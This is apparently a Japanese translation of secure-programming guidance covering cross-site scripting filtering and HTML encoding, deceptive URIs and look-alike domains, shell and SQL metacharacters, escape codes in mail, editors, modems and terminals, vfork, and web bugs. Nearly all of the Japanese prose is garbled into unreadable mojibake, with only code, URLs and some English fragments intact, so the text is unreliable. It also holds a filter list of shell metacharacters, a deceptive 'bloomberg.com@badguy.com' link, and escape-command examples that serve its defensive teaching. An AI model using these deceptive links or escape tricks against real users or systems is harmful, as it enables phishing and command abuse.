    ꂽy[Wɓ荞݂܂ (CERT Advisory CA-2000-02, Malicious
    HTML Tags Embedded in Client Web Requests <http://www.cert.org/
    advisories/CA-2000-02.html>)B
   
 

6.15.2. TCgɂ܂ӂRecɑΏ@

{Iɂ́AWeb AvP[V̏o͂ǂ̃[Ue󂯂ĂA
tB^(̖N͔r܂)A(̖
N͕Ėh܂)A؂(uSȁvf[^
ʂ蔲܂)Ƃ؂łBɂ́AURL p^tH[f[
^NbL[Af[^x[X̃NGA CORBA ORB ̌ʁAt@CɊi[
Ă郆[Ũf[^͂ƂēnĂoׂ͂Ă܂݂܂B
tB^Oƌ؂́AقƂǂ̏ꍇ͎ɍς܂Ăǂ
łA͓͂̌؂Əo͂̍쐬̊Ԃ̂ǂ炩ōsĂǂ
v܂B͂邱ƂȂf[^ʂĂ܂ĂȂA͎Ƀf[
^𕄍ǂƎv܂(YȂł傤)Bv
Õf[^ȂA͎ł͂Ȃo͎ɕ
ȒPłB CERT ̓tB^Oƕo͎ɍs悤AĂ
܂B͂Ȃ̂łA͎ɍsIȃP[XX܂
Bo͖ɂׂẴP[XԗȂ΂ȂȂ͔̂ɖŁA@
̂ɂ炸ȒPƂ͂܂By󒐁FCORBA(Comon Object
Request Broker Architecture) ORB(Object Request Broker)ɂĂ
͓̂̂ŁAXLAbv̂߂̕UIuWFNg <http:
//www.atmarkit.co.jp/fjava/rensai2/objetry01/objetry01.html>Ă
B킩₷Ǝv܂z

ӁBo͂̕Rg[łȂ΁ÃeNjbN
𗧂ȂȂP[XȂ肠܂BłȂƂAU҂́u\z
ɂȂvsAŘ_eNjbN𖳌ɂł܂B
肪ƂɁARg[͓̂܂Bo͂̕
̃Rg[ɂẮA Section 8.5Ř_Ă܂B

L̃TuZNVł́A܂tB^AA؂
肷Kvꕶ̎ʕ@ɂĘ_Ǎɂ̕
̃tB^╄͂̌ؕ@ɂĘ_܂Bf[^؂
ʓIȕ@_TuZNV͂܂񂪁A͂̌؈ʂ
 Chapter 4A͂ HTML eLXĝ̂ URI Ȃ Section
4.10ĂB܂AWeb AvP[V͈ӂTCg
铊e󂯂Ƃ̂ŁANGȊOł GET vgR̎gp͋֎~
Ă (Section 4.11QƂĂ)B

 

6.15.2.1. ꕶʂ

ł́A܂܂Ȋɂꕶڂ܂B (̈ꗗ쐬
 CERT Ɋӂ܂)

 E ubNx̗vf(Ƃ΁AHTML  XML ̃ubNɊ܂܂eL
    Xg̃pOtɓoꂷ)
   
      u<v́A^OJnƂӖœłB
       
      u&v́AGeBeB͂܂ƂӖœłB
       
      "ugt;v́AuEU̒ɓʈ̂AƂ
        œłB̃y[W̒҂A{͊Jńu<" u
        ̂ɁAԈďȂĂ܂ƂOłB
       
 E lɂ
   
      dpň͂܂ꂽlɂāAdp͑l̏I[
        ƂƂœłB
       
      dpň͂܂ꂽlɂāAdp͑l̏I[
        ƂƂœłB XML ł͈dp͐Kł͂ȂƂ
        ӂĂBdp͎gȂ悤܂B
       
      pĂȂlł́AXy[X^uƂ
        ʈɂȂ܂B XML ł͐K̂̂łȂłȂA
        ɑ̕ʈɂĂ܂ƂɒӂĂB
        ܂AIɒl𐶐̂gĂȂAptȂ
        gp͎̂^ł܂B
       
      u&v́AGeBeB̎n_ɂȂĂ邽߁A
        ̂ɎgpƂƂœłB
       
 E Ƃ URL ɂƂƁA錟GW͌ʂ̃y[W\
    Ãy[W̃N[UNbNČĎsł
    ܂B̋@\́ANG URL ɕ邱ƂŎĂ
    ܂BsƁAǉ̓ꕶ荞݂܂B
   
      Xy[X^uAśAURL ̏I[̈ƂȂ̂œłB
       
      u&v́AGeBeB̂͂܂łACGI ̃p^
        ͂܂ł肷ƂƂœłB
       
      ASCII ł͂Ȃ(ISO-8859-1  128 ȏ) URL ł͔F߂
        Ă܂B URL  ASCII ł͂Ȃ͓ł
        B
       
      u%v͓͂ŃtB^Ȃ΂܂B HTTP ̃GXP[v
        V[PXŕꂽp^łĂAT[oŎg
        ĂR[h֕Ȃ΂܂B͂u%68%65%6C%6C%6F
        vȂAtB^ Web TCg̃y[Wł́uhellov
        Ȃ܂B
       
 E <SCRIPT>  </SCRIPT> ň͂܂ꂽɂZ~R⊇ʁA
    AśÃXNvgE^OɒڃeLXg}ł󋵉
    ̓tB^ׂłB 
   
 E T[õXNvgœ͂ɂ銴Q(!)o͂œdp(") ɕ
    ȂAɒǉŃtB^KvɂȂ܂B
   
ʓI HTML  XML ɂẮAApTh(&)͓ꈵłB

 

6.15.2.2. tB^O

̓ꕶ@̈ɁAPɓꕶ폜Ă܂Ƃ
肪܂(ʏ͓͂Əo͂̊Ԃ)B

ɐ𓾂邽߂ɓ͂؂ĂȂ(ׂł)A
̈ꗗꕶ菜̂͊ȒPłBɁAPerl ŏt
B^ڂĂ܂B̃tB^͐ȕ󂯕tA󔒈
Ôǂȓꕶ󂯕t܂̂ŁAp̂悤ȕŎgp
̂ɂȂLłB

 # Accept only legal characters:                                       
 $summary =~ tr/A-Za-z0-9\ \.\://dc;                                   

A{ɍŒ̕菜ȂA̕폜
Tu[`Ăǂł傤B

 sub remove_special_chars {                                            
  local($s) = @_;                                                      
  $s =~ s/[\<\>\"\'\%\;\(\)\&\+]//g;                                   
  return $s;                                                           
 }                                                                     
 # Sample use:                                                         
 $data = &remove_special_chars($data);                                 

 

6.15.2.3. 

ꕶ폜ʂ̕@ɁAꕶ𕄍ēȈӖȂ
Ă܂܂B̕@́AɃtB^@ɑ
Ď኱AɃf[^肱ڂȂ_DĂ܂B[U
猩āAtB^ߒŃf[^u߂ႭvɂȂȂAȂ
ƂĂ΁AXĂf[^̍č\\ɂȂ܂
B

HTML  XMLASGML ͊FAApTh(u&v){ŉ炩̕
܂镶ƂĎgĂ܂B́̕uHTML GR[hvƂ悭
Ă܂B̕𕄍ɂ́Åœꕶ
ϊĂ邾łBʂ́Au<vu&lt;vAu>vu&gt;vAu&
vu&amp;vAu"vu&quot;vƂȂ܂BLŒӂȂ΂Ȃ
̂́Áu>v͂ŋKv͂Ȃ̂łAuEUɂ́u>
vĂ܂̂̂(u<vĂ܂)Aŋ邱
Ƃɂ܂Bdpʓ|ŁAu&quot;vgKv̂͑
łAÂuEUɂ͂ƕ\łȂ̂܂B
ɕGɂȂĂ܂ȂȂAKvɉāu"v𕄍Ă
܂񂪁APɕ₳̂ŁA[UɃuEŨo[W
Abv肢ĂB

 HTML GR[fBOɑ΂@́A󋵂ɂĂ͕\
łȂP[X܂B Section 8.5 Ř_Ă܂Ao͕̕
(uZbgv)w肵ĂKv܂Bo͕̕Ƃ͕
̕gĕ𕄍Ăf[^ȂA炩̎ł
Kv܂BȂƏo͂ɐȂȂAʂɂȂ
B܂ ISO-8859-1 ȊOŕďo͂ȂAƂȂ镄
łAuEUɓꕶ(u<v̂悤)̕ēnȂ
ɂĂB̂̃P[XłꂪɂȂ܂B
LgĂ̂ł́A UTF-7  UTF-8 ɓ܂Bu
ƂȂv̕h@ɂĂ̏ڂɂẮASection
4.8 ĂB̖݊@̈ɁA܂
Iɂ ISO 10646 (Unicode Ɠl)ɕϊĂ܂@
܂BĂāAւ̎QƂ͕GeBeBւ̎Q
gāA\܂B

 E ւ̎QƂ́Au&#D;v̂悤ɍs܂BD  10 iłB
    Au&#xH;v́u&#XH;vƂ܂BH  16 iłB̐
    ́AISO 10646 R[hł(Unicode Ɠlł)B܂ &#
    1048; ̓L̑啶́uIvłB SGML Ki(ISO 8879)ł 16
    inT|[gĂ܂̂ŁAo͂ɂ 10 ingp悤
    ɂE߂܂B܂ SGML ̎dlł́AŌ㑱̃Z~R
    ̏ȗF߂Ă܂BۂɁAVXȇł͈܂B
    āAɃZ~Rɕt悤ɂĂB
   
 E GeBeBւ̎QƂ́A悤Ȃ̂łÂɊo
    ₷OgĂ܂BƂ΁Au&lt;v < \킵܂B
    HTML ĂȂA HTML dl <http://www.w3.org> Ɋo₷
    OׂĈꗗɂĂ܂̂ŁAĂB
   
ǂ̌n(͕GeBeB)ł܂܂Bu<vu>
vAu&vAu"vւ̎QƂ͕GeBeBgƂE߂܂B
R̓R[h(o)ĉ₷łBƂ͂낢ŁAǂ̌n
SʓIɗDĂ邩A͂肵܂BƂŐlŏo͂ҏW
ȂAGeBeBgƂɂ͎gĂBȂ
΁AvOȒPɂȂƂRŁA10 iŕQƂ悤ɂ
܂B̃̕v́AɂĂ͂܂ɗ܂(Ƃ
AWǍł)BɎgpRečȂAʂ̕
(Zbg) IAȂ(Ƃ΁u<v)tB^悢
܂BȂF߂Ă܂悤ȑ́̕AĂ
悤ɂĂB

URI ͓Ǝɕ̎dg݂pӂĂ܂Bʏ͂uURL GR[
fBOvƌĂł܂B̌nł́AURL ɔF߂Ȃp[Z
gĽ 2  16 ilgĕ\܂B ISO 10646(Unicode)
߁A܂R[h UTF-8 ɕϊĂ畄邱Ƃ
܂B URI ̌؂ɂĂ Section 4.10.4 łɘ_Ă܂̂ŁA
ĂB

 

6.16. Z}eBbNU̗

uZ}eBbNUvƂ́AU҂Rs[^̐ݔVXe𗘗p
āA炩̕@ŋ]҂܂AĂ܂Ƃw܂B
Ƃ̂́A{̃Rs[^̐ݔVXes悤
ɐ݌vꂽ̂Ƃ͕ʂ̂ƂĂ܂Ƃw܂BZ}eBbN
Uɂ́AZ\܂܂ĂāAU҂]҂܂AU҂ɑ
^Ă܂܂(Ƃ΁AǂɓĂ悤Ɏv킹)B
΁AU҂̓[UɐMł Web TCgĂƐM܂悤
邩܂B{͂łȂ̂ɂ炸AłB

Z}ebNXU͑ΏłBR̓Rs[^̐
pĂ邩łBZ}ebNXUɑΏɂ́AɃ[Uɏ
^ċCÂ邱ƂłB܂uȁvƂNƁA[U
ƏƂƂ邩AxڂƈႤNĂƒm
܂B

ƂāAURI ܂B@薳ɂ炷A[U
Ⴆčl邩܂BƂƂ΁A URI ĂB

  http://www.bloomberg.com@www.badguy.com                              

 URI NbNƁA[U Bloomberg(Zij[X񋟂
Ă) ɍsƎv܂񂪁Â www.badguy.com ɍs
Ă܂܂ (āA[U www.bloomberg.com  www.badguy.com 
n܂A www.badguy.com ͓sǂƂɂ𖳎ł傤)B
badguy.com  Web TCg bloomberg.com ̃TCg܂˂ĂȂA[
U͎{̃TCgĂƁAMĂ܂܂(čU
҂Rg[ĂɁA[U߂Ă܂܂)B
͕igȂ URI OɂĂ܂BNbJu URI ̓[U
ݒł܂Ai͂Ă܂B̃P[X̉ɂ́AWeb
uEUigȂ URI mƂA|bvAbvŊmF߂
(u[U www.bloomberg.com  www.badguy.com ɃOC悤Ƃ
܂B܂Hv̂悤)d|邱Ƃl܂B̎d|
Ń[UύXł悤ɂȂ΁AUh䂪łƓɁA
[Uɑ΂Ēǉ@\񋟂ł܂B

ʂ̗́AԂňႤӖt(`ً`)ŁAɍԂɌ
铯`ً`łB镶݂͂ɎČ܂AlɂĂ
\܂BƂ΁A0([)O(̃I[)݂͂ɎĂ
̂ŁA[U WWW.BLOOMBERG.COM  WWW.BL00MBERG.COM Ⴄ Web Ah
Xł̂킩Ȃ܂BɌڂɂ́A1(
 1)l( L)܂B낢ȍ̕Ă΁A
Ԃ͂ɈȂ܂BƂ΁AL̑啔́A悻p
Ɠ悤Ɍ܂ARs[^͈Ⴄ̂ƂĈ܂B󂽂
ẴVXéAzXgƂĂ낢ȍ̕F߂Ă܂B
ƂȗRȂAzXgƂăT|[gKvLF
ł傤BĂ 1 ɁAقȂnقȂFgĕ\
@Ă܂B܂A[U͎oIɂƏ𓾂܂
B[U URI ƂƁA炭ȐFɋCt͂ł
[Gabrilovich 2002]BA̓Z}eBbNȖ݂͂
Ah킷͍̂łBmɌ΁ARs[^͐삵
̂łB

 

6.17. f[^̎ނɋCz

gpĂf[^̎ނɒӂĂBC^tF[XɎgĂ
̂ɂẮAɒӂĂBƂ΁Ausignedvu
unsignedv̒ĺȂ(C  C++ ̂悤) ňقȂ󂯂
܂B

 

Chapter 7. ̃\[X𗘗pꍇ͐Td

                                    NɈ˂藊ł͂ȂȂBlԂ 
                                    ͋~͂͂ȂB                   
                                                                       
                                               񐹏 146  3 

ۂ̂ƂA{̈ӖŎȊĂvO͂܂Bق
ׂẴvÓA\[X𗘗p̂ɑ̃vOĂяo
܂BƂ΁AIy[eBOVXe\tgEFAECu
񋟂vOłBɂ́Ȃ̃\[Xɑ΂ĂяoA
\ɌȂAȂĂ͎łȂȂ̐́uBꂽvd
g݂KvƂĂ肵܂BƂ΁AICu̎̎dgݓ
łBvOMĂ鑼̃\[XɂĐTdɂȂȂ΂
Ȃ͖̂炩łB܂Aɗv𑗂@ɂĂAmF
Ȃ悤ɂȂ΂܂B

 

7.1. SȃCuE[`Ăяo

ZLeBƒۉ(B)̊Jjyт̍ėpeȂꍇ
܂B́Ax̃Cu[`SɎĂ
ȂA킩Ȃ_łBdlǂł킩܂B
SłƂĂA[`̑̃o[WmɈSł
Ƃ͌܂񂵁AC^tF[X̃vbgtH[łSł
Ƃ͌܂B 

ǂ̂ƂAAvP[VSɂȂ΂ȂȂȂAɂ͎
gŃCuE[`̃o[WĎ͂߂ɂȂ܂B
CuE[`KvƂZLeBvɓ邱ƂmFł
΁A{Iɉ̂Ƀ[`Ď𓾂Ȃł傤B
CÂɂȂƎv܂AꍇɂĂ̓Cu̎CK
v܂BAZLeB̎_CuE[`
IʁAQ̂̓[UłBĎȂ΂Ȃꍇ
ɂ́Ax̃C^tF[Xg悤ɂĂB΁A
̃C^tF[XSɎgVXeł́Ax̃C^tF[X
؂ւ܂B

\ȂA[`SłȂ̃eXgĂBĈ
SȂΎgp悤ɂĂBȂÃeXgRp
CCXg[Ɏsǂł傤(Ƃ΁AuautoconfvX
Nvg̈ꕔƂ)Bł́A̎̎seXg͌Ił
܂Bʂ̏ł͖̑Ă܂BCu
̍ĎɔY݂Ȃ΁AȂƂCuSł邱
mFAłȂꍇɂ̓CXg[𒆒fĂB
΁A[USłȂvOCXg[鋰ꂪȂ
ȂA肪ł邩𗝉ł܂B

 

7.2. lłĂяo

ʂ̃vOĂяoꍇ͂łAɃp^ƂėLO
ɗ\zĂlĂ邱ƂmFKv܂B
͌ƍłBƌ̂A܂܂ȃCu֐R}
hA჌x̊֐ӊOȕ@ŌĂяoĂ邩Ȃł
BƂ΁AVXeR[̑͊ԐړIɃVFs܂B
蕶n̂ɓāAVF̃^LN^댯ȌʂN
\܂Bł́AŃ^LN^ɂĘ_܂傤B

 

7.3. ^LN^

VXȇAƂ΃R}hCEVF SQL C^v^ɂ́A
u^LN^v݂܂B܂͒̂镶Af[^Ƃ
߂܂B̂悤ȕ̓R}hłAR}h⑼̃f[
^炠f[^ʂ邽߂̎ʎqł肵܂BgpĂV
XẽC^tF[XɌdlȂAƃ^LN^܂
Ă͂łBvÕVXes悤ɂȂĂāA
U҂̂悤ȃ^LN^ꍞ߂ȂAU҂͊SɃvO
Rg[Ă܂AƂ̂܂̌łB

^LN^̖ōłL͈͂ɓnĂ̂́AVF̃^LN
^łBWI Unix CNȃR}hEVF(/bin/sh )́A
̐̕ʈ܂B̕VFɓnƁAGXP[v
ĂȂAʂɉ߂܂B̎pāAvO
Ă܂B WWW Security FAQ [Stein 1999, Q37]ɂ΁A
̂悤ȃ^LN^͉L̂̂łB

& ; ` ' \ " | * ? ~ < > ^ ( ) [ ] { } $ \n \r                       


ӂׂ́A^u󔒕GXP[vʂ낢날̂ł
AƂ_łB(Ɖs)̓p^̃ftHg̃Zp^
BZp^̒l IFS ϐݒ肵ĕύXł܂A̕ϐ̏o
MpłȂȂA̒lj邩Aϐߒŉ炩
̕@ŃZbgĂB

ɂASȃXg͌ɂ݂͑܂Bł͋^킵Ǝv
镶𑼂ɂĂ܂B

 E u!v͎ł͂܂(C ł͎ł)BvO̕ԂleXg
    ȂAړ ! ƁAXNvg\Ďۂɂ͐Ă
    悤AsĂ悤֌WȂAs悤ɂȂ܂BV
    Fɂ́AR}hɃANZX̂ɂu!vĝ܂
    BꂪɖɂȂꍇ܂B bash ł͂͑Θb[h
    ̏ꍇɂ܂Atcsh(csh ̃N[ŁAĂ Linux
    fBXgr[V܂)ł́u!vXNvgłg
    ܂B
   
 E u#v̓RgƂĎg܂B̕ȍ~̃eLXg͖
    ܂B
   
 E u-v͊ԈăIvV̊JnƉ߂鋰ꂪ܂(
    A-- ƂāAׂẴIvV@\𖳌ɂĂ܂)BƂAt
    @ĆuɁvĂƂĂAVFOɋ󔒂ƔF
    ܂ƍƂɂȂ܂B
   
 E uv()u\tv(^u)Au\nv(s)Au\rv(^[)Au\vv
    (Xy[X)Au\fv(tH[EtB[h)̋󔒕́Au1 v
    ̃t@C𕡐̈ɂĂ܂܂B
   
 E ̑̐䕶( NIL)́AVF̎ɂĂ͖N
    ܂B
   
 E gɂ܂Au.v(uJgVFŎsv)u=v(ϐ
    ݒ) ́AȕłBA܂ŌĂ̌ł́A
    ̑(Ɩ)ZLeB̖肪݂Ă܂B
   
 

VF̃^LN^̉eL͈͂ɂȂĂ܂Ă̂́A
̏dvȃCuER[AƂ popen(3) system(3)AR}
hVFĂяoĎs邩łB܂AVF̃^LN^
e󂯂Ă܂Bl execlp(3) execvp(3)VFĂяo
dg݂ɂȂĂ܂B popen(3) system(3)Aexeclp(3)Aexecvp(3)
gpȂ悤ɒĂĂKChCAvZX𐶐
ꍇɂ execve(3) C ꂩ璼ڌĂяo悤ɒĂĂ܂
[Galvin 1998b]BƂɂAexecve(3)gȂAsystem(3)̎gp
ĂBsystem(3)̓VFgĕWJ܂̂ŁA댯
L܂Bl Perl VF̃obNNH[g(`)R}hVF
яo܂B Perl ɂĂ̏ڂ Section 9.2ĂB

SQL ɂ^LN^܂̂ŁA悤Ȗ肪 SQL ̌Ăяo
݂Ă܂B SPI Dynamic's paper ``SQL Injection: Are your Web
Applications Vulnerable?'' <http://www.spidynamics.com/papers/
SQLInjectionWhitePaper.pdf> ĂB̓_ɂĂɘ_
܂傤B Chapter 4Ř_ʂAɌIȃp^`āA
p^Ƀ}b`͂悤ɂĂBp^ ^[0-9]
$  ^[0-9A-Za-z]*$ ɐĂȂA͋NȂł傤
B SQL ^LN^f[^KvȂAʂ
ɕϊĂ(ł邾)AۑĂBƂ΁A
HTML GR[ĥ悤(̏ꍇ́AApTh𕄍ĂK
v܂)B܂pŃ[Uׂ̓͂Ă͂łBƂf
[^łĂłB΁A󔒂⑼̎ނ̃f[^͊댯ł
ȂȂ܂B

̕ 1 łYƍГ邩܂BƂ΁Av
Ȏ́AobNXbVVF̃^LN^Ƃč폜
܂܂ [rfp 1999]B Chapter 4Ř_悤ɁA@́A
͂ꂽ炷A̕ƂGXP[v@łBA
͂邩ɓK؂ȉ@́Aǂ̕̂œ肷@
BāA̕悤ɃtB^܂B

vOɂ́AlԂƂ肷ׂ݌vꂽ̂񂠂܂
B̂悤ȃvÓAuʂȁvsׂuGXP[vvR[h
܂BƈʓI(Ŋ댯)ȃGXP[vR[h 1 ɁAR}h
C𗧂グƂ̂܂B̂悤ȁuGXP[vvR}h
Ζ悤ɂĂ (Ȃ΁ÃR}hmɈS
悤ɂĂ)BƂ΁AR}hCw̃[EvO
(mail mailx ̂悤)ł́A`_(~)GXP[vLN^ƂĎg
Ă܂B`_͑ʂ̃R}h𑗂ꍇɎgĂ܂B炩
ɖQȃR}hAƂ΁Aumail admin < file-from-uservAʓI
Cӂ̃vOŝɗpł܂B vi  emacsAed ̂悤ȑ
b`̃vÓAuGXP[vvdg݂ĂāA[Uv
OsɔCӂ̃VFER}h𑖂点܂BĂяovO
̃hLgׂāAGXP[vdg݂Ȃ
B̃vOĂяoȂAp̂Ăяo
ɂ̂K؂łBSection 7.4 ĂB

GXP[vR[h́AΏ۔͈͂჌xȃn[hEFA̕
i₻G~[ĝɂ܂ōL܂Bfɂ͂Ău
HayesvƌĂ΂Ă閽߃ZbgĂ܂B̖߃ZbgL
ɂȂĂƁAx𔭐u+++vƂt[Y₻ɂƂȂ
̒xɂāÃR}hɑeLXgfɑ΂R}hƉ
߂܂B̓T[rXۍU̎sɗpł܂(uATH0v𑗂
ƂŁAfnOAbv܂)A[Uʂ̏ɐڑ邱Ƃ
\ł(IȍU҂ȂU҂䂵Ă}VoR悤ɁA
[U̐ڑ̌oHςĂ܂܂)BP[XfɌ肷΁AΏ
̂͊ȒPł(Ƃ΁Af̏uATS2-255vĂ
܂)B܂ʓIȖ͎cĂ܂B჌xȕi₻̃G~
[^𐧌䂵ĂȂAKɑgݍłGXP[vR[h
ɂ邩A΍{ĂB

u[vC^tF[Xł́AɂȂȂċv VT100 ̂悤Ȑ̂̒[
̃GXP[vR[hĂP[X܂BR[h͂
Ă֗ŁA[̃C^tF[XgāAƂΕ𑾂At
Hg̐FςÄʒuɈړł܂BAڒ[
̃XN[ɔCӂ̐MłȂf[^̑oF߂Ă͂܂BƂ
̂́AR[hɂĂ͏dȖN̂邩łBVX
eɂ́AL[̊蓖ĂύXł̂܂(Ƃ΁A[Uu
Enterv̓t@NVL[ƂŁA]݂̃R}h𑗂Ď
sł܂)Bɂ́AR[h𑗂ăXN[NAA]҂Ƃ
lɎsR}h\ł肷̂܂B\
āAʂuɖ߂v߂𑗂āAL[̂҂ɍU
҂I񂾖߂sĂ܂܂B͒ʏuy[W[hEobt
@OvƂ@\gĎĂ܂B̃ZLeB̖
Az tty(foCXt@CƂĒ񋟂ĂāAʏ /dev ɂ
)L҂ɂ݂\ŁAɂ͒N߂Ȃ悤ɂׂ
闝RɂȂĂ܂Bāȗ̏݁vp[~bVݒ
ĂĂ͂܂B܂A[UO[v(܂u[UvCx[
gO[vvƂ@)̃o[łȂȂAuO[vɂ鏑
݁vp[~bV[ɑ΂Ăׂł͂܂[Filipski 1986]
B[Uɑ΂ăf[^([)[ŕ\ĂȂASmFĂ
Ȃ肷ׂĂ̐䕶(32 l̕)tB^āA[U
ɖ߂f[^菜Kv܂Bň̏󋵂ł́A^us(
炭As)SƂŁAc肷ׂĂr܂BnCrbg
Ă镶(܂ 127 傫l)ɂ̓eNjbNv܂B
VXeɂ́ArbgĂȂƂsĂ܂̂
BPɂ̕tB^OƁA낢ȍ̌t
gpւĂ܂܂B̏ꍇ̓P[XɉČĂKv܂
B

Ɋ֘AāANIL LN^(LN^ 0)ӊOȉeyڂ
܂B C  C++ ̊֐̑啔́ANIL LN^̏I
[̈Ƒz肵Ă܂Ǎ(Perl  Ada95 )̕֐
 NIL 𕶎̈ꕔƂĈ܂BCuJ[ľĂяo C
̈𓥏PĂ܂̂ŁA`FbNeƎێgpev
܂[rfp 1999]B

̃vOĂяoAt@CQƂ肷鎞ɂ́At
pX (Ƃ /usr/bin/sort)̂悤)Ŏw肷悤ɂĂB
邱ƂŁAuԈvR}hĂяoۂɐG[𖳂
łȂAPATH ϐԈĐݒ肳ĂĂG[ł܂
B̃t@C̎QƂɂĂAuԈvJnpXw肵ʐ
点܂B

 

7.4. vO}̃C^tF[XĂяo

vOɗpӂĂAvP[VEvO~OEC^
tF[X (API)Ăяo悤ɂĂBʏvO͑̃v
OĂяo܂Bɂ́AۂɐlƂ肷悤ɐ݌v
vO܂܂܂BvOĂяôɁAl
悤ɃvO݌v̂ł͏\ł͂܂BvÕq
[}EC^tF[XƂ@\Lxł邪̂ɁAɐ䂷
̂ɂȂĂ_ɂȂ܂B Section 7.3 Ř_悤ɁA
bIȃvOɂ́uGXP[vvR[h悭܂BȂƁAU
҂sK؂ȋ@\słĂ܂܂B܂AΘbIȃvÓu
낤vƂftHg̐ݒs悤Ƃ܂Bꂪ
ĂftHg̓ł͂Ȃ܂BU҂́Aɂ
ގi邩܂B

ʏ풼ڌĂяoĂ͂ȂvOɂ́Amail  mailxAedAviA
emacs ܂BŒ̃vO̓͂܂`FbNĂ
AĂяoĂB

ʏ͈SȃANZX邽߂ɁAvO@\Ƃăp^
Aʂ API ĂAgȂŃvOp̃AvP
[V肵܂BƂ΁AeLXgEGfB^(ed  viAemacs
̂悤)ĂяoăeLXgҏWɁAsed g܂B

 

7.5. VXeR[̕Ԃlׂ͂ă`FbN

VXeR[ŃG[󋵂Ԃ̂́AׂẴG[Ԃ`Fb
NKv܂B܂RƂĂ̂́AVXeR[̂
ƂǂׂĂAꂽVXeE\[XΏۂƂĂÃ\[
Xɑ΂ă[U͂܂܂ȕ@ŉe^邩łB setuid 
setgid ꂽvOɂ́Asetrlimit(3) nice(2)̂悤ȃVXeR[
ĂяoƂŁÃvOŎgp郊\[X̐ł܂B
T[ovO𗘗pÕ[U CGI XNvǵAɑʂ
NGXgT[oɗvă\[XHׂ܂BG[K؂Ɉ
ȂȂ΁AɏqׂtFCEZ[tɂĂB

 

7.6. vfork(2)͎gȂ

Unix CNȃVXeŐVvZXȒPɂڐAč쐬
ɂ́Afork(2) VXeR[gp܂B BSD  vfork(2)ƌĂ΂
VXeR[𓱓āA@̍œK}܂B vfork(2) fork(2)
Ƃ͈قȂAexecve(2V)ĂяoAexit ܂ł́AqvZXev
ZX̃␧Xbh؂Ă܂BevZX͎qvZX
\[XgĂԁATXyh܂BÂ BSD ł fork(2)
ۂɃRs[̂ɑ΂āAvfork(2)ł͂Ȃ_{łB
Linux ł̖͂͂܂܂BȂȂALinux ͓ł̓R
s[EIECggĂāAύXɂy[WRs[
܂ (ۂ́Aɂ܂Rs[Ȃ΂Ȃe[u
݂܂B啔̓ł́ÃI[o[wbh͂قǏd͂
܂)Bɂ炸Avfork(2)gvO݂
ŁAŋ߂ɂȂ Linux  BSD  vfork(2) ܂(܂ł
Avfork(2)  fork(2)̃GCAXł)B

vfork(2) ɂ͂Ȃ肪܂BڐA̓_炷ƁAvfork(2)́Ae
vZXɊȂ悤ɂ̂ɁÂƂ납ȂgbL[Ƃ낪
܂BɍxȌɂĂ̓_łBuȂv
ɂɂ́Aۂɐ}VR[hɔfKv܂B
ARpC͕\ɏoȂꎞIȐ\zO̊NR[h
\Ă܂P[X܂B_ƂāAvfork(2)gĂv
ÓAR[hςARpC̃o[Wς肷
łĂ@\ȂȂ܂B

Linux VXëSKvȃvOɂƂāA͂ɏ󋵂
܂BȂȂALinux(ȂƂo[W 2.2  2.2.17 ܂)
vfork()̎ɋԂNƎ㐫邩łB Linux œv
ZX[ŨR}hŝ vfork(2)  execve(2) yAŎg
ĂƁAԂ܂BqvZXɃ[U uid œ삵
邪Aexecve(2)͂ĂȂP[XłB[U SIGSTOP ܂ރVOi
̃vZXɑ邩܂B vfork(2)ł́A
evZXqvZXƓlɃubN܂BʓIɁA
ȂvZXAvZX𒆒f܂B܂肱
AvZX̃T[rXɑ΂T[rXۍUɂȂ܂B
ȂƂ FreeBSD  OpenBSD ł́ÃP[XɑΏR[hĂ
܂B̖ɑ΂Ǝ㐫́AmĂ肠܂B Solar
Designer ɊӂĂ܂Bނ 2000 N 10  7  security-audit
[OXg Linux ɂāA̖ɌyA؋Ă
B

vfork(2)ɂāA_͂͂肵Ă܂BvOł vfork(2)g
ȂAłB͓̂Ȃ͂łBvfork(2)Ɏgp
́Avfork KvƂĂÂvOT|[g邽߂
B

 

7.7. g݃Rec̓ǂݍݎɔ Web oOɑΏ

f[^tH[}bgɂ́ARecւ̎QƂgݍނ߂̂܂
B̎QƂ́Af[^ɎIɓǂݏo܂([UI
҂)B̃f[^C^[lbgoR(SEL)œǂݏo
ȂA̋@\gēǎ҂ɂĂ̒mȂĂA擾ł
\܂B܂ꍇɂẮAǎ҂ɏ𓾂Ȃ܂܋Iɓ
邱Ƃ\łB̃vCoV[Ɋ֘AuWeb oOvƌ
ԏꍇ܂B

Web oOgāAhLg̒ɂ炩ߎQƂ𖄂ߍ݂܂BR
ec̒҂́ANAǂŁAǂȕ@ŃhLgǂ񂾂̂ǐ
̂ɁA𗘗p܂B܂҂͊{Iɂ͂ǂ̂悤Ɂu݌
ĂvhLglʂ̐lցAgDʂ̑gDւƂǂ
悤ɓnĂ̂܂B

HTML tH[}bg͈ȑO炱̖Ă܂B Privacy
Foundation <http://www.privacyfoundation.org> ɂ΁A

   
    C^[lbgōLЂ́A Web oO Web y[WōL
    pĂ܂B܂ǐՒs߂ HTML x[X̓dq[
    łgĂ܂B́Aʑ傫 1 x 1 sNZŁAXN
    [ł͖ڂɌAǐՒɎgĂ̂BĂ܂B
    A(img ^Og)摜ł͂܂B Web oO
    sĂ HTML ^Oɂ́AƂ΁At[tH[ĂяoAX
    Nvg܂BPƂ Web oOsƁuvTCgɑ΂
    āAǎ҂ IP AhXǎ҂Kꂽy[WAuEUɂĂ̂
    ܂ȏ񋟂܂BNbL[킹ėpƁAǎ҂ʂ
    ł悤ɂȂ܂B Web oOɂĂ̊TvɂẮA http:
    //www.securityspace.com/s_survey/data/man.200102/webbug.html Ō
    ܂B
   
ƐSzȂ̂́ÃhLg̃tH[}bĝ悤ȋ@\
Ă悤Ɍ_łB Web TCgɂ HTML  Web uEUŌ
ɁANf[^uEWOĂ邩Ƃ擾@ʂ
܂BAdq[̂悤ȕʂ̃tH[}bg̃hLg
鎞ɁAhLgǂ񂾂ŊĎĂ܂Ƒzł郆[U
قƂǂ܂BƂ΁Aŋ߂ɂȂ Microsoft Word  Web oÕT
|[g肵܂B the Privacy Foundation advisory for more
information <http://www.privacyfoundation.org/advisories/
advWordBugs.html> ĂB̊ŌyĂ悤ɁAŋ߂
o[W Microsoft Excel  Microsoft Power Point ݌ł܂
BꍇɂẮANbL[͂ɏ擾̂ɗpł܂B

Web oÓAɃt@CtH[}bg̐݌vɓĖƂȂ܂B
[UvCoV[厖ɂȂA炭t@C܂ގIȃ_
E[hɐȂ邵傤Bt@Ĉ_E[h
(܂AWeb uEUoR)́AO 1 łB̃t@C𓯂
瓯ԂɃ_E[hĂA[Uɂ͂قƂǊ֌W܂B

 

7.8. 閧ɂ͉B

